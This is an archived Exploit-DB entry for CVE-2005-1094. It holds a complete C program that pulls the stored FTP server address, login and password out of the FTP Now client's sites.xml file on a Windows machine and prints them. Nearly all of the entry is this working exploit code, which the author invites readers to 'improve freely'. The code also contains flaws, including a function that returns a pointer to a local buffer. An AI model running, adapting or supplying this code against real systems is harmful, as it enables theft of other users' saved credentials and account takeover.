FTP Now <= 2.6.14 - Local Password Disclosure Exploit

2005-04-06T00:00:00
ID EDB-ID:918
Type exploitdb
Reporter Kozan
Modified 2005-04-06T00:00:00

Description

FTP Now <= 2.6.14 Local Password Disclosure Exploit. CVE-2005-1094. Local exploit for windows platform

                                        
                                            /*******************************************************************

FTP Now v2.6.14 Local Password Disclosure Exploit by Kozan

Application: FTP Now v2.6.14 (and prior versions)
Vendor:www.network-client.com
Vulnerable Description: FTP Now v2.6.14 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;windows.h&gt;

HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int adresal(char *FilePath,char *Str)
{
       char kr;
       int Sayac=0;
       int Offset=-1;
       FILE *di;
       di=fopen(FilePath,"rb");

       if( di == NULL )
       {
               fclose(di);
               return -1;
       }

       while(!feof(di))
       {
               Sayac++;
               for(int i=0;i&lt;strlen(Str);i++)
               {
                       kr=getc(di);
                       if(kr != Str[i])
                       {
                               if( i&gt;0 )
                               {
                                       fseek(di,Sayac+1,SEEK_SET);
                               }
                               break;
                       }
                       if( i &gt; ( strlen(Str)-2 ) )
                       {
                               Offset = ftell(di)-strlen(Str);
                               fclose(di);
                               return Offset;
                       }
               }
       }
       fclose(di);
       return -1;
}

char *oku(char *FilePath,char *Str)
{

       FILE *di;
       char cr;
       int i=0;
       char Feature[500];

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 )
               return "";

       if( (di=fopen(FilePath,"rb")) == NULL )
               return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

       while(!feof(di))
       {
               cr=getc(di);
               if(cr == '&lt;')
                       break;
               Feature[i] = cr;
               i++;
       }

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}

int main()
{
       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                                                      (LPBYTE) prgfiles, &dwBufLen);

       if( (lRet != ERROR_SUCCESS) || (dwBufLen &gt; BUFSIZE) )
               {
                       RegCloseKey(hKey);
                       printf("An error occured!\n");
           exit(1);
       }

       RegCloseKey(hKey);

   }
       else
       {
       RegCloseKey(hKey);
               printf("An error occured!\n");
       exit(1);
   }

       strcat(prgfiles,"\\FTP Now\\sites.xml");

       printf("FTP Now &lt;= v2.6.14 Local Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
       printf("This exploit only show the first profile and its password.\n");
       printf("You may improve it freely...\n\n");

       char FtpAddress[BUFSIZE], FtpUsername[BUFSIZE], FtpPassword[BUFSIZE];

       strcpy(FtpAddress,oku(prgfiles,"&lt;ADDRESS&gt;"));
       strcpy(FtpUsername,oku(prgfiles,"&lt;LOGIN&gt;"));
       strcpy(FtpPassword,oku(prgfiles,"&lt;PASSWORD&gt;"));

       printf("Ftp Address   : %s\n",FtpAddress);
       printf("Ftp Username  : %s\n",FtpUsername);
       printf("Ftp Password  : %s\n",FtpPassword);

       return 0;
}

// milw0rm.com [2005-04-06]